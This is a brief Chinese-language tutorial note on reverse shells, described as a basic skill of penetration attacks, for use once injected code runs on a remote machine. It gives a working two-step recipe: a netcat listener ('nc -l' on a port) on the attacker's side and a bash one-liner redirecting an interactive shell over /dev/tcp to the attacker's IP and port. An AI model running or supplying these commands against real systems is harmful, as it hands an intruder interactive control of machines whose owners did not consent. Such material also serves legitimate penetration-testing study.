【Reverse shell】也叫反弹shell,是渗透攻击的基本功,如果你找到机会让远端的机器执行你注入的代码,你的代码怎样才能为你生成一个可以交互操作的shell呢?

你可以在本地先用nc启动一个监听进程【nc -l 端口号

然后在远端执行【bash -i >& /dev/tcp/你本地的IP/端口号 0>&1】即可。